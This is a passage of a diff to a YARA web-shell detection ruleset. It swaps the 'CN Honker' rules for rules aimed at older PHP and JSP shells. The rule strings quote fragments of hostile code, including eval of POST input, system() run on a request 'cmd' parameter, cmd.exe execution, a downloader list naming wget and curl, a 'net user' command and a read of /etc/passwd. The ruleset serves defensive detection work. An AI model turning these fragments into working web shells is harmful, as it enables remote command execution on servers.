-		$s2 = "$this->smtp_debug(\"> \".$cmd.\"\\n\");" fullword ascii
+		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
 
 	condition:
-		filesize < 39KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Phpwebbackup : FILE
+rule SIGNATURE_BASE_Webshell_PHP_R57142
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file phpwebbackup.php"
+		description = "Web Shell - file r57142.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "eb737ea6-231c-5e8d-b976-75f1044f9f54"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L247-L262"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1408-L1421"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c788cb280b7ad0429313837082fe84e9a49efab6"
-		logic_hash = "45452fc415fbafe170a1b1f5a58df40f0ec65a9a6678e675b40a8c54e2d8bd6c"
+		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+		logic_hash = "3afa0463de3acb12480dba1b2ab9cd53fca88216ba54c5e044e48ebd84bf17bd"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php // Code By isosky www.nbst.org" fullword ascii
-		$s2 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
+		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
 
 	condition:
-		uint16( 0 ) == 0x3f3c and filesize < 67KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Dz_Phpcms_Phpbb : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Tree
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file dz_phpcms_phpbb.txt"
+		description = "Web Shell - file tree.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f7e5413f-a7c9-51d4-8422-30c3e2462be2"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L264-L281"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1422-L1436"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "33f23c41df452f8ca2768545ac6e740f30c44d1f"
-		logic_hash = "1455df58f51c3ae7558b89c940d97ea5870f261217b2a09727bb6678bcbd5500"
+		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+		logic_hash = "180aa4572a42d23f3e44589f876356ec973fd64cdd53bac69936b93699888ac2"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "if($pwd == md5(md5($password).$salt))" fullword ascii
-		$s2 = "function test_1($password)" fullword ascii
-		$s3 = ":\".$pwd.\"\\n---------------------------------\\n\";exit;" fullword ascii
-		$s4 = ":user=\".$user.\"\\n\";echo \"pwd=\".$pwd.\"\\n\";echo \"salt=\".$salt.\"\\n\";" fullword ascii
+		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
 
 	condition:
-		filesize < 22KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Picloaked_1 : FILE
+rule SIGNATURE_BASE_Webshell_C99Madshell_V_3_0_Smowu
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file 1.gif"
+		description = "Web Shell - file smowu.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ff44c4a-ed97-5635-9926-8d54a8364fab"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L283-L299"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1437-L1451"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3eab1798cbc9ab3b2c67d3da7b418d07e775db70"
-		logic_hash = "a816ac9e98b7c5208f075ffcb9a6525016d6a5c468005d78ecab90d651423705"
+		hash = "74e1e7c7a6798f1663efb42882b85bee"
+		logic_hash = "d84a5c573b89790efdbe67a684feb7db88521027e86b7588f090696fd90cbc87"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?php eval($_POST[" ascii
-		$s1 = ";<%execute(request(" ascii
-		$s3 = "GIF89a" fullword ascii
+		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
 
 	condition:
-		filesize < 6KB and 2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Assembly : FILE
+rule SIGNATURE_BASE_Webshell_Simple_Backdoor
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file assembly.asp"
+		description = "Web Shell - file simple-backdoor.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7639e81d-fe21-5a12-9a20-fe894eefef73"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L301-L315"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1452-L1467"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2bcb4d22758b20df6b9135d3fb3c8f35a9d9028e"
-		logic_hash = "34dc47b2f91a15a62175f3cab88d5ff24d2a3aa62f74fb9e43a4aaae96ced999"
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+		logic_hash = "252285e8a796757235d775427e5a73980d065c1221190545428910a77f46bb9a"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "response.write oScriptlhn.exec(\"cmd.exe /c\" & request(\"c\")).stdout.readall" fullword ascii
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s4 = "system($cmd);" fullword
 
 	condition:
-		filesize < 1KB and all of them
+		2 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php8 : FILE
+rule SIGNATURE_BASE_Webshell_PHP_404
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php8.txt"
+		description = "Web Shell - file 404.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b25b7f3-b94e-5887-b102-b52d340a4316"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L317-L334"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1468-L1481"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b7b49f1d6645865691eccd025e140c521ff01cce"
-		logic_hash = "435ceb72c082f702284c464979a907a59a42bb4aa07311f9b2da1a9831efac11"
+		hash = "078c55ac475ab9e028f94f879f548bca"
+		logic_hash = "b0524ecddf990048e3e40f471c24075c0e87654c6fe40f17dc3ff43743402e24"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<a href=\"http://hi.baidu.com/ca3tie1/home\" target=\"_blank\">Ca3tie1's Blog</a" ascii
-		$s1 = "function startfile($path = 'dodo.zip')" fullword ascii
-		$s3 = "<form name=\"myform\" method=\"post\" action=\"\">" fullword ascii
-		$s5 = "$_REQUEST[zipname] = \"dodozip.zip\"; " fullword ascii
+		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
 
 	condition:
-		filesize < 25KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Xx : FILE
+rule SIGNATURE_BASE_Webshell_Macker_S_Private_Phpshell
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file xx.php"
+		description = "Web Shell - file Macker's Private PHPShell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "72a04950-b82d-516f-a376-5253b7de1158"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L336-L352"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1482-L1497"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "2f39f1d9846ae72fc673f9166536dc21d8f396aa"
-		logic_hash = "67c542f172fd1b97fbee4697fd42bab9486e3d779ce62993617e5a5205bd75d4"
+		hash = "e24cbf0e294da9ac2117dc660d890bb9"
+		logic_hash = "4bccc1aca8698e601133436a55538c08e3e1fa113a0776c04590eaf4a10fd309"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "$mysql.=\"insert into `$table`($keys) values($vals);\\r\\n\";" fullword ascii
-		$s2 = "$mysql_link=@mysql_connect($mysql_servername , $mysql_username , $mysql_password" ascii
-		$s16 = "mysql_query(\"SET NAMES gbk\");" fullword ascii
+		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
 
 	condition:
-		filesize < 2KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_JSPMSSQL : FILE
+rule SIGNATURE_BASE_Webshell_Antichat_Shell_V1_3_2
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file JSPMSSQL.txt"
+		description = "Web Shell - file Antichat Shell v1.3.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "061c1e53-edd0-5838-8d0f-6fb8f4fa078a"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L354-L369"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1498-L1511"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "c6b4faecd743d151fe0a4634e37c9a5f6533655f"
-		logic_hash = "c08e69345cb09e41840a81dcd8a015f9e1be93d570b64c310be74631e5314e2f"
+		hash = "40d0abceba125868be7f3f990f031521"
+		logic_hash = "d5a1dc31f442f8db7771ee64164436f6c562ef9f4a203a1e2006d37f9df91846"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<form action=\"?action=operator&cmd=execute\"" fullword ascii
-		$s2 = "String sql = request.getParameter(\"sqlcmd\");" fullword ascii
+		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
 
 	condition:
-		filesize < 35KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Injection_Transit_Jmpost : FILE
+rule SIGNATURE_BASE_Webshell_Safe_Mode_Breaker
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file jmPost.asp"
+		description = "Web Shell - file Safe mode breaker.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "892f747e-6065-5baf-b928-8d69d8792483"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L371-L386"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1512-L1526"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "f80ec26bbdc803786925e8e0450ad7146b2478ff"
-		logic_hash = "6c7f52cf7ff6df9867ea2c46cd8f40ef0e077d4e1d9033cde0649a209bffe21b"
+		hash = "5bd07ccb1111950a5b47327946bfa194"
+		logic_hash = "4adcefc05413a02653a2a405791345a1a76058a39f6e2b03765c4485f7c6b106"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "response.write  PostData(JMUrl,JmStr,JmCok,JmRef)" fullword ascii
-		$s2 = "JmdcwName=request(\"jmdcw\")" fullword ascii
+		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
 
 	condition:
-		filesize < 9KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Web_Asp : FILE
+rule SIGNATURE_BASE_Webshell_Sst_Sheller
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file web.asp.txt"
+		description = "Web Shell - file Sst-Sheller.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67e03591-770a-5b32-9579-c899894740fc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L388-L403"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1527-L1541"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "aebf6530e89af2ad332062c6aae4a8ca91517c76"
-		logic_hash = "5d2d7e6b9340ee4fd845ff05c99526c919214974b1a0def66492fe3cd4a75fe9"
+		hash = "d93c62a0a042252f7531d8632511ca56"
+		logic_hash = "4faac0b22fec809f2100bad200ba1f9fb9e16fab743e1b1cbfe0b80c6d2fee32"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<FORM method=post target=_blank>ShellUrl: <INPUT " fullword ascii
-		$s1 = "\" >[Copy code]</a> 4ngr7&nbsp; &nbsp;</td>" fullword ascii
+		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
 
 	condition:
-		filesize < 13KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Wshell_Asp : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_List
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file wshell-asp.txt"
+		description = "Web Shell - file list.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "294f0d00-7102-553d-92e2-c0a0e017385c"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L405-L421"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1542-L1557"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "4a0afdf5a45a759c14e99eb5315964368ca53e9c"
-		logic_hash = "f3c4af85e4798d3a809d8edd9cc46d1df44453f14ed050b002fe789da4d6096f"
+		hash = "1ea290ff4259dcaeb680cec992738eda"
+		logic_hash = "5641bff0ec161fe72e502641b6138186d541ebfcbf499e0295a61f9f6f085654"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "file1.Write(\"<%response.clear:execute request(\\\"root\\\"):response.End%>\");" fullword ascii
-		$s2 = "hello word !  " fullword ascii
-		$s3 = "root.asp " fullword ascii
+		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
 
 	condition:
-		filesize < 5KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_ASP_Asp404 : FILE
+rule SIGNATURE_BASE_Webshell_Phpjackal_V1_5
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file asp404.txt"
+		description = "Web Shell - file PHPJackal v1.5.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4125bb40-3f5c-53f5-b906-54fa77b119f5"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L423-L439"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1558-L1572"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bed51971288aeabba6dabbfb80d2843ec0c4ebf6"
-		logic_hash = "c84be2e561a08317be11cdb0fe103f8ad182a64d8cd1bf987163ebbeabe20f00"
+		hash = "d76dc20a4017191216a0315b7286056f"
+		logic_hash = "457bc71cb8e684dafb14b1c5d2faa4366cedce5eba9545493be2b1d49daf98b6"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "temp1 = Len(folderspec) - Len(server.MapPath(\"./\")) -1" fullword ascii
-		$s1 = "<form name=\"form1\" method=\"post\" action=\"<%= url%>?action=chklogin\">" fullword ascii
-		$s2 = "<td>&nbsp;<a href=\"<%=tempurl+f1.name%>\" target=\"_blank\"><%=f1.name%></a></t" ascii
+		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
 
 	condition:
-		filesize < 113KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Serv_U_Asp : FILE
+rule SIGNATURE_BASE_Webshell_Customize
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file Serv-U asp.txt"
+		description = "Web Shell - file customize.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "06a58a05-92bd-5124-a172-2bfd9491c2fc"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L441-L457"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1573-L1586"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "cee91cd462a459d31a95ac08fe80c70d2f9c1611"
-		logic_hash = "c98c3f4db5ea812827b6108ef88b57116621142202248f4f26f0c71bd76e33ec"
+		hash = "d55578eccad090f30f5d735b8ec530b1"
+		logic_hash = "462d97427793ef6e897b33f4fd02d452ad8cd11ddef21aa25d13efc981eb3afb"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "newuser = \"-SETUSERSETUP\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \"-PortNo=\" &" ascii
-		$s2 = "<td><input name=\"c\" type=\"text\" id=\"c\" value=\"cmd /c net user goldsun lov" ascii
-		$s3 = "deldomain = \"-DELETEDOMAIN\" & vbCrLf & \"-IP=0.0.0.0\" & vbCrLf & \" PortNo=\"" ascii
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
 
 	condition:
-		filesize < 30KB and 2 of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Cfm_List : FILE
+rule SIGNATURE_BASE_Webshell_S72_Shell_V1_1_Coding
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file list.cfm"
+		description = "Web Shell - file s72 Shell v1.1 Coding.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "98302eef-d1e8-5524-a57e-d49c0e92c7e0"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L459-L474"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1587-L1600"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "85d445b13d2aef1df3b264c9b66d73f0ff345cec"
-		logic_hash = "41c7c5ba6187a8871dec83bcd859b9377813d60cea8ef2b4ad390c67de04e010"
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+		logic_hash = "fd200d8aa347242546a1da311edc61ceebaec5f7d6b4fe2f49f069b36689f547"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<TD><a href=\"javascript:ShowFile('#mydirectory.name#')\">#mydirectory.name#</a>" ascii
-		$s2 = "<TD>#mydirectory.size#</TD>" fullword ascii
+		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
 
 	condition:
-		filesize < 10KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_PHP_Php2 : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Sys3
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file php2.txt"
+		description = "Web Shell - file sys3.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "377ff89d-a9ba-526c-97a1-388f9ccb48ba"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L476-L491"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1601-L1616"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bf12e1d741075cd1bd324a143ec26c732a241dea"
-		logic_hash = "707e2795d82636fbbc4d9f5324e509a526f77f9ead8f3c4d59dd0e95bc94f11e"
+		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+		logic_hash = "14b0ac1b1b8538b0c05dcd0a8b7129fdcad2e595ea00630bd55cee6dff596d4f"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "$OOO0O0O00=__FILE__;$OOO000000=urldecode('" ascii
-		$s2 = "<?php // Black" fullword ascii
+		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
 
 	condition:
-		filesize < 12KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_CN_Honker_Webshell_Tuoku_Script_Oracle : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_Guige02
 {
 	meta:
-		description = "Webshell from CN Honker Pentest Toolset - file oracle.jsp"
+		description = "Web Shell - file guige02.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "adc8dea6-8031-580b-b19a-e5520d41528f"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/cn_pentestset_webshells.yar#L493-L509"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L1617-L1631"
